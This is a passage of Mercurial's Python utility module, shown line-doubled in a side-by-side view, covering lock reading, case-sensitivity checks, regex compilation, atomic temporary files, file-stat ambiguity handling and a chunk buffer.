2117 except AttributeError: # no symlink in os
2118 pass
2118 pass
2119
2119
2120 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2120 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2121 ld = os.open(pathname, flags)
2121 ld = os.open(pathname, flags)
2122 os.write(ld, info)
2122 os.write(ld, info)
2123 os.close(ld)
2123 os.close(ld)
2124
2124
2125
2125
2126 def readlock(pathname):
2126 def readlock(pathname):
2127 # type: (bytes) -> bytes
2127 # type: (bytes) -> bytes
2128 try:
2128 try:
2129 return readlink(pathname)
2129 return readlink(pathname)
2130 except OSError as why:
2130 except OSError as why:
2131 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2131 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2132 raise
2132 raise
2133 except AttributeError: # no symlink in os
2133 except AttributeError: # no symlink in os
2134 pass
2134 pass
2135 with posixfile(pathname, b'rb') as fp:
2135 with posixfile(pathname, b'rb') as fp:
2136 return fp.read()
2136 return fp.read()
2137
2137
2138
2138
2139 def fstat(fp):
2139 def fstat(fp):
2140 '''stat file object that may not have fileno method.'''
2140 '''stat file object that may not have fileno method.'''
2141 try:
2141 try:
2142 return os.fstat(fp.fileno())
2142 return os.fstat(fp.fileno())
2143 except AttributeError:
2143 except AttributeError:
2144 return os.stat(fp.name)
2144 return os.stat(fp.name)
2145
2145
2146
2146
2147 # File system features
2147 # File system features
2148
2148
2149
2149
2150 def fscasesensitive(path):
2150 def fscasesensitive(path):
2151 # type: (bytes) -> bool
2151 # type: (bytes) -> bool
2152 """
2152 """
2153 Return true if the given path is on a case-sensitive filesystem
2153 Return true if the given path is on a case-sensitive filesystem
2154
2154
2155 Requires a path (like /foo/.hg) ending with a foldable final
2155 Requires a path (like /foo/.hg) ending with a foldable final
2156 directory component.
2156 directory component.
2157 """
2157 """
2158 s1 = os.lstat(path)
2158 s1 = os.lstat(path)
2159 d, b = os.path.split(path)
2159 d, b = os.path.split(path)
2160 b2 = b.upper()
2160 b2 = b.upper()
2161 if b == b2:
2161 if b == b2:
2162 b2 = b.lower()
2162 b2 = b.lower()
2163 if b == b2:
2163 if b == b2:
2164 return True # no evidence against case sensitivity
2164 return True # no evidence against case sensitivity
2165 p2 = os.path.join(d, b2)
2165 p2 = os.path.join(d, b2)
2166 try:
2166 try:
2167 s2 = os.lstat(p2)
2167 s2 = os.lstat(p2)
2168 if s2 == s1:
2168 if s2 == s1:
2169 return False
2169 return False
2170 return True
2170 return True
2171 except OSError:
2171 except OSError:
2172 return True
2172 return True
2173
2173
2174
2174
2175 try:
2175 try:
2176 import re2 # pytype: disable=import-error
2176 import re2 # pytype: disable=import-error
2177
2177
2178 _re2 = None
2178 _re2 = None
2179 except ImportError:
2179 except ImportError:
2180 _re2 = False
2180 _re2 = False
2181
2181
2182
2182
2183 class _re(object):
2183 class _re(object):
2184 def _checkre2(self):
2184 def _checkre2(self):
2185 global _re2
2185 global _re2
2186 try:
2186 try:
2187 # check if match works, see issue3964
2187 # check if match works, see issue3964
2188 _re2 = bool(re2.match(br'\[([^\[]+)\]', b'[ui]'))
2188 _re2 = bool(re2.match(br'\[([^\[]+)\]', b'[ui]'))
2189 except ImportError:
2189 except ImportError:
2190 _re2 = False
2190 _re2 = False
2191
2191
2192 def compile(self, pat, flags=0):
2192 def compile(self, pat, flags=0):
2193 """Compile a regular expression, using re2 if possible
2193 """Compile a regular expression, using re2 if possible
2194
2194
2195 For best performance, use only re2-compatible regexp features. The
2195 For best performance, use only re2-compatible regexp features. The
2196 only flags from the re module that are re2-compatible are
2196 only flags from the re module that are re2-compatible are
2197 IGNORECASE and MULTILINE."""
2197 IGNORECASE and MULTILINE."""
2198 if _re2 is None:
2198 if _re2 is None:
2199 self._checkre2()
2199 self._checkre2()
2200 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2200 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2201 if flags & remod.IGNORECASE:
2201 if flags & remod.IGNORECASE:
2202 pat = b'(?i)' + pat
2202 pat = b'(?i)' + pat
2203 if flags & remod.MULTILINE:
2203 if flags & remod.MULTILINE:
2204 pat = b'(?m)' + pat
2204 pat = b'(?m)' + pat
2205 try:
2205 try:
2206 return re2.compile(pat)
2206 return re2.compile(pat)
2207 except re2.error:
2207 except re2.error:
2208 pass
2208 pass
2209 return remod.compile(pat, flags)
2209 return remod.compile(pat, flags)
2210
2210
2211 @propertycache
2211 @propertycache
2212 def escape(self):
2212 def escape(self):
2213 """Return the version of escape corresponding to self.compile.
2213 """Return the version of escape corresponding to self.compile.
2214
2214
2215 This is imperfect because whether re2 or re is used for a particular
2215 This is imperfect because whether re2 or re is used for a particular
2216 function depends on the flags, etc, but it's the best we can do.
2216 function depends on the flags, etc, but it's the best we can do.
2217 """
2217 """
2218 global _re2
2218 global _re2
2219 if _re2 is None:
2219 if _re2 is None:
2220 self._checkre2()
2220 self._checkre2()
2221 if _re2:
2221 if _re2:
2222 return re2.escape
2222 return re2.escape
2223 else:
2223 else:
2224 return remod.escape
2224 return remod.escape
2225
2225
2226
2226
2227 re = _re()
2227 re = _re()
2228
2228
2229 _fspathcache = {}
2229 _fspathcache = {}
2230
2230
2231
2231
2232 def fspath(name, root):
2232 def fspath(name, root):
2233 # type: (bytes, bytes) -> bytes
2233 # type: (bytes, bytes) -> bytes
2234 """Get name in the case stored in the filesystem
2234 """Get name in the case stored in the filesystem
2235
2235
2236 The name should be relative to root, and be normcase-ed for efficiency.
2236 The name should be relative to root, and be normcase-ed for efficiency.
2237
2237
2238 Note that this function is unnecessary, and should not be
2238 Note that this function is unnecessary, and should not be
2239 called, for case-sensitive filesystems (simply because it's expensive).
2239 called, for case-sensitive filesystems (simply because it's expensive).
2240
2240
2241 The root should be normcase-ed, too.
2241 The root should be normcase-ed, too.
2242 """
2242 """
2243
2243
2244 def _makefspathcacheentry(dir):
2244 def _makefspathcacheentry(dir):
2245 return {normcase(n): n for n in os.listdir(dir)}
2245 return {normcase(n): n for n in os.listdir(dir)}
2246
2246
2247 seps = pycompat.ossep
2247 seps = pycompat.ossep
2248 if pycompat.osaltsep:
2248 if pycompat.osaltsep:
2249 seps = seps + pycompat.osaltsep
2249 seps = seps + pycompat.osaltsep
2250 # Protect backslashes. This gets silly very quickly.
2250 # Protect backslashes. This gets silly very quickly.
2251 seps.replace(b'\\', b'\\\\')
2251 seps.replace(b'\\', b'\\\\')
2252 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2252 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2253 dir = os.path.normpath(root)
2253 dir = os.path.normpath(root)
2254 result = []
2254 result = []
2255 for part, sep in pattern.findall(name):
2255 for part, sep in pattern.findall(name):
2256 if sep:
2256 if sep:
2257 result.append(sep)
2257 result.append(sep)
2258 continue
2258 continue
2259
2259
2260 if dir not in _fspathcache:
2260 if dir not in _fspathcache:
2261 _fspathcache[dir] = _makefspathcacheentry(dir)
2261 _fspathcache[dir] = _makefspathcacheentry(dir)
2262 contents = _fspathcache[dir]
2262 contents = _fspathcache[dir]
2263
2263
2264 found = contents.get(part)
2264 found = contents.get(part)
2265 if not found:
2265 if not found:
2266 # retry "once per directory" per "dirstate.walk" which
2266 # retry "once per directory" per "dirstate.walk" which
2267 # may take place for each patches of "hg qpush", for example
2267 # may take place for each patches of "hg qpush", for example
2268 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2268 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2269 found = contents.get(part)
2269 found = contents.get(part)
2270
2270
2271 result.append(found or part)
2271 result.append(found or part)
2272 dir = os.path.join(dir, part)
2272 dir = os.path.join(dir, part)
2273
2273
2274 return b''.join(result)
2274 return b''.join(result)
2275
2275
2276
2276
2277 def checknlink(testfile):
2277 def checknlink(testfile):
2278 # type: (bytes) -> bool
2278 # type: (bytes) -> bool
2279 '''check whether hardlink count reporting works properly'''
2279 '''check whether hardlink count reporting works properly'''
2280
2280
2281 # testfile may be open, so we need a separate file for checking to
2281 # testfile may be open, so we need a separate file for checking to
2282 # work around issue2543 (or testfile may get lost on Samba shares)
2282 # work around issue2543 (or testfile may get lost on Samba shares)
2283 f1, f2, fp = None, None, None
2283 f1, f2, fp = None, None, None
2284 try:
2284 try:
2285 fd, f1 = pycompat.mkstemp(
2285 fd, f1 = pycompat.mkstemp(
2286 prefix=b'.%s-' % os.path.basename(testfile),
2286 prefix=b'.%s-' % os.path.basename(testfile),
2287 suffix=b'1~',
2287 suffix=b'1~',
2288 dir=os.path.dirname(testfile),
2288 dir=os.path.dirname(testfile),
2289 )
2289 )
2290 os.close(fd)
2290 os.close(fd)
2291 f2 = b'%s2~' % f1[:-2]
2291 f2 = b'%s2~' % f1[:-2]
2292
2292
2293 oslink(f1, f2)
2293 oslink(f1, f2)
2294 # nlinks() may behave differently for files on Windows shares if
2294 # nlinks() may behave differently for files on Windows shares if
2295 # the file is open.
2295 # the file is open.
2296 fp = posixfile(f2)
2296 fp = posixfile(f2)
2297 return nlinks(f2) > 1
2297 return nlinks(f2) > 1
2298 except OSError:
2298 except OSError:
2299 return False
2299 return False
2300 finally:
2300 finally:
2301 if fp is not None:
2301 if fp is not None:
2302 fp.close()
2302 fp.close()
2303 for f in (f1, f2):
2303 for f in (f1, f2):
2304 try:
2304 try:
2305 if f is not None:
2305 if f is not None:
2306 os.unlink(f)
2306 os.unlink(f)
2307 except OSError:
2307 except OSError:
2308 pass
2308 pass
2309
2309
2310
2310
2311 def endswithsep(path):
2311 def endswithsep(path):
2312 # type: (bytes) -> bool
2312 # type: (bytes) -> bool
2313 '''Check path ends with os.sep or os.altsep.'''
2313 '''Check path ends with os.sep or os.altsep.'''
2314 return bool( # help pytype
2314 return bool( # help pytype
2315 path.endswith(pycompat.ossep)
2315 path.endswith(pycompat.ossep)
2316 or pycompat.osaltsep
2316 or pycompat.osaltsep
2317 and path.endswith(pycompat.osaltsep)
2317 and path.endswith(pycompat.osaltsep)
2318 )
2318 )
2319
2319
2320
2320
2321 def splitpath(path):
2321 def splitpath(path):
2322 # type: (bytes) -> List[bytes]
2322 # type: (bytes) -> List[bytes]
2323 """Split path by os.sep.
2323 """Split path by os.sep.
2324 Note that this function does not use os.altsep because this is
2324 Note that this function does not use os.altsep because this is
2325 an alternative of simple "xxx.split(os.sep)".
2325 an alternative of simple "xxx.split(os.sep)".
2326 It is recommended to use os.path.normpath() before using this
2326 It is recommended to use os.path.normpath() before using this
2327 function if need."""
2327 function if need."""
2328 return path.split(pycompat.ossep)
2328 return path.split(pycompat.ossep)
2329
2329
2330
2330
2331 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2331 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2332 """Create a temporary file with the same contents from name
2332 """Create a temporary file with the same contents from name
2333
2333
2334 The permission bits are copied from the original file.
2334 The permission bits are copied from the original file.
2335
2335
2336 If the temporary file is going to be truncated immediately, you
2336 If the temporary file is going to be truncated immediately, you
2337 can use emptyok=True as an optimization.
2337 can use emptyok=True as an optimization.
2338
2338
2339 Returns the name of the temporary file.
2339 Returns the name of the temporary file.
2340 """
2340 """
2341 d, fn = os.path.split(name)
2341 d, fn = os.path.split(name)
2342 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2342 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2343 os.close(fd)
2343 os.close(fd)
2344 # Temporary files are created with mode 0600, which is usually not
2344 # Temporary files are created with mode 0600, which is usually not
2345 # what we want. If the original file already exists, just copy
2345 # what we want. If the original file already exists, just copy
2346 # its mode. Otherwise, manually obey umask.
2346 # its mode. Otherwise, manually obey umask.
2347 copymode(name, temp, createmode, enforcewritable)
2347 copymode(name, temp, createmode, enforcewritable)
2348
2348
2349 if emptyok:
2349 if emptyok:
2350 return temp
2350 return temp
2351 try:
2351 try:
2352 try:
2352 try:
2353 ifp = posixfile(name, b"rb")
2353 ifp = posixfile(name, b"rb")
2354 except IOError as inst:
2354 except IOError as inst:
2355 if inst.errno == errno.ENOENT:
2355 if inst.errno == errno.ENOENT:
2356 return temp
2356 return temp
2357 if not getattr(inst, 'filename', None):
2357 if not getattr(inst, 'filename', None):
2358 inst.filename = name
2358 inst.filename = name
2359 raise
2359 raise
2360 ofp = posixfile(temp, b"wb")
2360 ofp = posixfile(temp, b"wb")
2361 for chunk in filechunkiter(ifp):
2361 for chunk in filechunkiter(ifp):
2362 ofp.write(chunk)
2362 ofp.write(chunk)
2363 ifp.close()
2363 ifp.close()
2364 ofp.close()
2364 ofp.close()
2365 except: # re-raises
2365 except: # re-raises
2366 try:
2366 try:
2367 os.unlink(temp)
2367 os.unlink(temp)
2368 except OSError:
2368 except OSError:
2369 pass
2369 pass
2370 raise
2370 raise
2371 return temp
2371 return temp
2372
2372
2373
2373
2374 class filestat(object):
2374 class filestat(object):
2375 """help to exactly detect change of a file
2375 """help to exactly detect change of a file
2376
2376
2377 'stat' attribute is result of 'os.stat()' if specified 'path'
2377 'stat' attribute is result of 'os.stat()' if specified 'path'
2378 exists. Otherwise, it is None. This can avoid preparative
2378 exists. Otherwise, it is None. This can avoid preparative
2379 'exists()' examination on client side of this class.
2379 'exists()' examination on client side of this class.
2380 """
2380 """
2381
2381
2382 def __init__(self, stat):
2382 def __init__(self, stat):
2383 self.stat = stat
2383 self.stat = stat
2384
2384
2385 @classmethod
2385 @classmethod
2386 def frompath(cls, path):
2386 def frompath(cls, path):
2387 try:
2387 try:
2388 stat = os.stat(path)
2388 stat = os.stat(path)
2389 except OSError as err:
2389 except OSError as err:
2390 if err.errno != errno.ENOENT:
2390 if err.errno != errno.ENOENT:
2391 raise
2391 raise
2392 stat = None
2392 stat = None
2393 return cls(stat)
2393 return cls(stat)
2394
2394
2395 @classmethod
2395 @classmethod
2396 def fromfp(cls, fp):
2396 def fromfp(cls, fp):
2397 stat = os.fstat(fp.fileno())
2397 stat = os.fstat(fp.fileno())
2398 return cls(stat)
2398 return cls(stat)
2399
2399
2400 __hash__ = object.__hash__
2400 __hash__ = object.__hash__
2401
2401
2402 def __eq__(self, old):
2402 def __eq__(self, old):
2403 try:
2403 try:
2404 # if ambiguity between stat of new and old file is
2404 # if ambiguity between stat of new and old file is
2405 # avoided, comparison of size, ctime and mtime is enough
2405 # avoided, comparison of size, ctime and mtime is enough
2406 # to exactly detect change of a file regardless of platform
2406 # to exactly detect change of a file regardless of platform
2407 return (
2407 return (
2408 self.stat.st_size == old.stat.st_size
2408 self.stat.st_size == old.stat.st_size
2409 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2409 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2410 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2410 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2411 )
2411 )
2412 except AttributeError:
2412 except AttributeError:
2413 pass
2413 pass
2414 try:
2414 try:
2415 return self.stat is None and old.stat is None
2415 return self.stat is None and old.stat is None
2416 except AttributeError:
2416 except AttributeError:
2417 return False
2417 return False
2418
2418
2419 def isambig(self, old):
2419 def isambig(self, old):
2420 """Examine whether new (= self) stat is ambiguous against old one
2420 """Examine whether new (= self) stat is ambiguous against old one
2421
2421
2422 "S[N]" below means stat of a file at N-th change:
2422 "S[N]" below means stat of a file at N-th change:
2423
2423
2424 - S[n-1].ctime < S[n].ctime: can detect change of a file
2424 - S[n-1].ctime < S[n].ctime: can detect change of a file
2425 - S[n-1].ctime == S[n].ctime
2425 - S[n-1].ctime == S[n].ctime
2426 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2426 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2427 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2427 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2428 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2428 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2429 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2429 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2430
2430
2431 Case (*2) above means that a file was changed twice or more at
2431 Case (*2) above means that a file was changed twice or more at
2432 same time in sec (= S[n-1].ctime), and comparison of timestamp
2432 same time in sec (= S[n-1].ctime), and comparison of timestamp
2433 is ambiguous.
2433 is ambiguous.
2434
2434
2435 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2435 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2436 timestamp is ambiguous".
2436 timestamp is ambiguous".
2437
2437
2438 But advancing mtime only in case (*2) doesn't work as
2438 But advancing mtime only in case (*2) doesn't work as
2439 expected, because naturally advanced S[n].mtime in case (*1)
2439 expected, because naturally advanced S[n].mtime in case (*1)
2440 might be equal to manually advanced S[n-1 or earlier].mtime.
2440 might be equal to manually advanced S[n-1 or earlier].mtime.
2441
2441
2442 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2442 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2443 treated as ambiguous regardless of mtime, to avoid overlooking
2443 treated as ambiguous regardless of mtime, to avoid overlooking
2444 by confliction between such mtime.
2444 by confliction between such mtime.
2445
2445
2446 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2446 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2447 S[n].mtime", even if size of a file isn't changed.
2447 S[n].mtime", even if size of a file isn't changed.
2448 """
2448 """
2449 try:
2449 try:
2450 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2450 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2451 except AttributeError:
2451 except AttributeError:
2452 return False
2452 return False
2453
2453
2454 def avoidambig(self, path, old):
2454 def avoidambig(self, path, old):
2455 """Change file stat of specified path to avoid ambiguity
2455 """Change file stat of specified path to avoid ambiguity
2456
2456
2457 'old' should be previous filestat of 'path'.
2457 'old' should be previous filestat of 'path'.
2458
2458
2459 This skips avoiding ambiguity, if a process doesn't have
2459 This skips avoiding ambiguity, if a process doesn't have
2460 appropriate privileges for 'path'. This returns False in this
2460 appropriate privileges for 'path'. This returns False in this
2461 case.
2461 case.
2462
2462
2463 Otherwise, this returns True, as "ambiguity is avoided".
2463 Otherwise, this returns True, as "ambiguity is avoided".
2464 """
2464 """
2465 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2465 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2466 try:
2466 try:
2467 os.utime(path, (advanced, advanced))
2467 os.utime(path, (advanced, advanced))
2468 except OSError as inst:
2468 except OSError as inst:
2469 if inst.errno == errno.EPERM:
2469 if inst.errno == errno.EPERM:
2470 # utime() on the file created by another user causes EPERM,
2470 # utime() on the file created by another user causes EPERM,
2471 # if a process doesn't have appropriate privileges
2471 # if a process doesn't have appropriate privileges
2472 return False
2472 return False
2473 raise
2473 raise
2474 return True
2474 return True
2475
2475
2476 def __ne__(self, other):
2476 def __ne__(self, other):
2477 return not self == other
2477 return not self == other
2478
2478
2479
2479
2480 class atomictempfile(object):
2480 class atomictempfile(object):
2481 """writable file object that atomically updates a file
2481 """writable file object that atomically updates a file
2482
2482
2483 All writes will go to a temporary copy of the original file. Call
2483 All writes will go to a temporary copy of the original file. Call
2484 close() when you are done writing, and atomictempfile will rename
2484 close() when you are done writing, and atomictempfile will rename
2485 the temporary copy to the original name, making the changes
2485 the temporary copy to the original name, making the changes
2486 visible. If the object is destroyed without being closed, all your
2486 visible. If the object is destroyed without being closed, all your
2487 writes are discarded.
2487 writes are discarded.
2488
2488
2489 checkambig argument of constructor is used with filestat, and is
2489 checkambig argument of constructor is used with filestat, and is
2490 useful only if target file is guarded by any lock (e.g. repo.lock
2490 useful only if target file is guarded by any lock (e.g. repo.lock
2491 or repo.wlock).
2491 or repo.wlock).
2492 """
2492 """
2493
2493
2494 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2494 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2495 self.__name = name # permanent name
2495 self.__name = name # permanent name
2496 self._tempname = mktempcopy(
2496 self._tempname = mktempcopy(
2497 name,
2497 name,
2498 emptyok=(b'w' in mode),
2498 emptyok=(b'w' in mode),
2499 createmode=createmode,
2499 createmode=createmode,
2500 enforcewritable=(b'w' in mode),
2500 enforcewritable=(b'w' in mode),
2501 )
2501 )
2502
2502
2503 self._fp = posixfile(self._tempname, mode)
2503 self._fp = posixfile(self._tempname, mode)
2504 self._checkambig = checkambig
2504 self._checkambig = checkambig
2505
2505
2506 # delegated methods
2506 # delegated methods
2507 self.read = self._fp.read
2507 self.read = self._fp.read
2508 self.write = self._fp.write
2508 self.write = self._fp.write
2509 self.seek = self._fp.seek
2509 self.seek = self._fp.seek
2510 self.tell = self._fp.tell
2510 self.tell = self._fp.tell
2511 self.fileno = self._fp.fileno
2511 self.fileno = self._fp.fileno
2512
2512
2513 def close(self):
2513 def close(self):
2514 if not self._fp.closed:
2514 if not self._fp.closed:
2515 self._fp.close()
2515 self._fp.close()
2516 filename = localpath(self.__name)
2516 filename = localpath(self.__name)
2517 oldstat = self._checkambig and filestat.frompath(filename)
2517 oldstat = self._checkambig and filestat.frompath(filename)
2518 if oldstat and oldstat.stat:
2518 if oldstat and oldstat.stat:
2519 rename(self._tempname, filename)
2519 rename(self._tempname, filename)
2520 newstat = filestat.frompath(filename)
2520 newstat = filestat.frompath(filename)
2521 if newstat.isambig(oldstat):
2521 if newstat.isambig(oldstat):
2522 # stat of changed file is ambiguous to original one
2522 # stat of changed file is ambiguous to original one
2523 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2523 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2524 os.utime(filename, (advanced, advanced))
2524 os.utime(filename, (advanced, advanced))
2525 else:
2525 else:
2526 rename(self._tempname, filename)
2526 rename(self._tempname, filename)
2527
2527
2528 def discard(self):
2528 def discard(self):
2529 if not self._fp.closed:
2529 if not self._fp.closed:
2530 try:
2530 try:
2531 os.unlink(self._tempname)
2531 os.unlink(self._tempname)
2532 except OSError:
2532 except OSError:
2533 pass
2533 pass
2534 self._fp.close()
2534 self._fp.close()
2535
2535
2536 def __del__(self):
2536 def __del__(self):
2537 if safehasattr(self, '_fp'): # constructor actually did something
2537 if safehasattr(self, '_fp'): # constructor actually did something
2538 self.discard()
2538 self.discard()
2539
2539
2540 def __enter__(self):
2540 def __enter__(self):
2541 return self
2541 return self
2542
2542
2543 def __exit__(self, exctype, excvalue, traceback):
2543 def __exit__(self, exctype, excvalue, traceback):
2544 if exctype is not None:
2544 if exctype is not None:
2545 self.discard()
2545 self.discard()
2546 else:
2546 else:
2547 self.close()
2547 self.close()
2548
2548
2549
2549
2550 def unlinkpath(f, ignoremissing=False, rmdir=True):
2550 def unlinkpath(f, ignoremissing=False, rmdir=True):
2551 # type: (bytes, bool, bool) -> None
2551 # type: (bytes, bool, bool) -> None
2552 """unlink and remove the directory if it is empty"""
2552 """unlink and remove the directory if it is empty"""
2553 if ignoremissing:
2553 if ignoremissing:
2554 tryunlink(f)
2554 tryunlink(f)
2555 else:
2555 else:
2556 unlink(f)
2556 unlink(f)
2557 if rmdir:
2557 if rmdir:
2558 # try removing directories that might now be empty
2558 # try removing directories that might now be empty
2559 try:
2559 try:
2560 removedirs(os.path.dirname(f))
2560 removedirs(os.path.dirname(f))
2561 except OSError:
2561 except OSError:
2562 pass
2562 pass
2563
2563
2564
2564
2565 def tryunlink(f):
2565 def tryunlink(f):
2566 # type: (bytes) -> None
2566 # type: (bytes) -> None
2567 """Attempt to remove a file, ignoring ENOENT errors."""
2567 """Attempt to remove a file, ignoring ENOENT errors."""
2568 try:
2568 try:
2569 unlink(f)
2569 unlink(f)
2570 except OSError as e:
2570 except OSError as e:
2571 if e.errno != errno.ENOENT:
2571 if e.errno != errno.ENOENT:
2572 raise
2572 raise
2573
2573
2574
2574
2575 def makedirs(name, mode=None, notindexed=False):
2575 def makedirs(name, mode=None, notindexed=False):
2576 # type: (bytes, Optional[int], bool) -> None
2576 # type: (bytes, Optional[int], bool) -> None
2577 """recursive directory creation with parent mode inheritance
2577 """recursive directory creation with parent mode inheritance
2578
2578
2579 Newly created directories are marked as "not to be indexed by
2579 Newly created directories are marked as "not to be indexed by
2580 the content indexing service", if ``notindexed`` is specified
2580 the content indexing service", if ``notindexed`` is specified
2581 for "write" mode access.
2581 for "write" mode access.
2582 """
2582 """
2583 try:
2583 try:
2584 makedir(name, notindexed)
2584 makedir(name, notindexed)
2585 except OSError as err:
2585 except OSError as err:
2586 if err.errno == errno.EEXIST:
2586 if err.errno == errno.EEXIST:
2587 return
2587 return
2588 if err.errno != errno.ENOENT or not name:
2588 if err.errno != errno.ENOENT or not name:
2589 raise
2589 raise
2590 parent = os.path.dirname(os.path.abspath(name))
2590 parent = os.path.dirname(os.path.abspath(name))
2591 if parent == name:
2591 if parent == name:
2592 raise
2592 raise
2593 makedirs(parent, mode, notindexed)
2593 makedirs(parent, mode, notindexed)
2594 try:
2594 try:
2595 makedir(name, notindexed)
2595 makedir(name, notindexed)
2596 except OSError as err:
2596 except OSError as err:
2597 # Catch EEXIST to handle races
2597 # Catch EEXIST to handle races
2598 if err.errno == errno.EEXIST:
2598 if err.errno == errno.EEXIST:
2599 return
2599 return
2600 raise
2600 raise
2601 if mode is not None:
2601 if mode is not None:
2602 os.chmod(name, mode)
2602 os.chmod(name, mode)
2603
2603
2604
2604
2605 def readfile(path):
2605 def readfile(path):
2606 # type: (bytes) -> bytes
2606 # type: (bytes) -> bytes
2607 with open(path, b'rb') as fp:
2607 with open(path, b'rb') as fp:
2608 return fp.read()
2608 return fp.read()
2609
2609
2610
2610
2611 def writefile(path, text):
2611 def writefile(path, text):
2612 # type: (bytes, bytes) -> None
2612 # type: (bytes, bytes) -> None
2613 with open(path, b'wb') as fp:
2613 with open(path, b'wb') as fp:
2614 fp.write(text)
2614 fp.write(text)
2615
2615
2616
2616
2617 def appendfile(path, text):
2617 def appendfile(path, text):
2618 # type: (bytes, bytes) -> None
2618 # type: (bytes, bytes) -> None
2619 with open(path, b'ab') as fp:
2619 with open(path, b'ab') as fp:
2620 fp.write(text)
2620 fp.write(text)
2621
2621
2622
2622
2623 class chunkbuffer(object):
2623 class chunkbuffer(object):
2624 """Allow arbitrary sized chunks of data to be efficiently read from an
2624 """Allow arbitrary sized chunks of data to be efficiently read from an
2625 iterator over chunks of arbitrary size."""
2625 iterator over chunks of arbitrary size."""
2626
2626
2627 def __init__(self, in_iter):
2627 def __init__(self, in_iter):
2628 """in_iter is the iterator that's iterating over the input chunks."""
2628 """in_iter is the iterator that's iterating over the input chunks."""
2629
2629
2630 def splitbig(chunks):
2630 def splitbig(chunks):
2631 for chunk in chunks:
2631 for chunk in chunks:
2632 if len(chunk) > 2 ** 20:
2632 if len(chunk) > 2 ** 20:
2633 pos = 0
2633 pos = 0
2634 while pos < len(chunk):
2634 while pos < len(chunk):
2635 end = pos + 2 ** 18
2635 end = pos + 2 ** 18
2636 yield chunk[pos:end]
2636 yield chunk[pos:end]
2637 pos = end
2637 pos = end
2638 else:
2638 else:
2639 yield chunk
2639 yield chunk
2640
2640
2641 self.iter = splitbig(in_iter)
2641 self.iter = splitbig(in_iter)
2642 self._queue = collections.deque()
2642 self._queue = collections.deque()
2643 self._chunkoffset = 0
2643 self._chunkoffset = 0
2644
2644
2645 def read(self, l=None):
2645 def read(self, l=None):
2646 """Read L bytes of data from the iterator of chunks of data.
2646 """Read L bytes of data from the iterator of chunks of data.
2647 Returns less than L bytes if the iterator runs dry.
2647 Returns less than L bytes if the iterator runs dry.
2648
2648
2649 If size parameter is omitted, read everything"""
2649 If size parameter is omitted, read everything"""
2650 if l is None:
2650 if l is None:
2651 return b''.join(self.iter)
2651 return b''.join(self.iter)
2652
2652
2653 left = l
2653 left = l
2654 buf = []
2654 buf = []
2655 queue = self._queue
2655 queue = self._queue
2656 while left > 0:
2656 while left > 0:
2657 # refill the queue
2657 # refill the queue
2658 if not queue:
2658 if not queue:
2659 target = 2 ** 18
2659 target = 2 ** 18
2660 for chunk in self.iter:
2660 for chunk in self.iter:
2661 queue.append(chunk)
2661 queue.append(chunk)
2662 target -= len(chunk)
2662 target -= len(chunk)
2663 if target <= 0:
2663 if target <= 0:
2664 break
2664 break
2665 if not queue:
2665 if not queue:
2666 break
2666 break
2667
2667
2668 # The easy way to do this would be to queue.popleft(), modify the
2668 # The easy way to do this would be to queue.popleft(), modify the
2669 # chunk (if necessary), then queue.appendleft(). However, for cases
2669 # chunk (if necessary), then queue.appendleft(). However, for cases
2670 # where we read partial chunk content, this incurs 2 dequeue
2670 # where we read partial chunk content, this incurs 2 dequeue
2671 # mutations and creates a new str for the remaining chunk in the
2671 # mutations and creates a new str for the remaining chunk in the
2672 # queue. Our code below avoids this overhead.
2672 # queue. Our code below avoids this overhead.
2673
2673
2674 chunk = queue[0]
2674 chunk = queue[0]
2675 chunkl = len(chunk)
2675 chunkl = len(chunk)
2676 offset = self._chunkoffset
2676 offset = self._chunkoffset
2677
2677
2678 # Use full chunk.
2678 # Use full chunk.
2679 if offset == 0 and left >= chunkl:
2679 if offset == 0 and left >= chunkl:
2680 left -= chunkl
2680 left -= chunkl
2681 queue.popleft()
2681 queue.popleft()
2682 buf.append(chunk)
2682 buf.append(chunk)
2683 # self._chunkoffset remains at 0.
2683 # self._chunkoffset remains at 0.
2684 continue
2684 continue
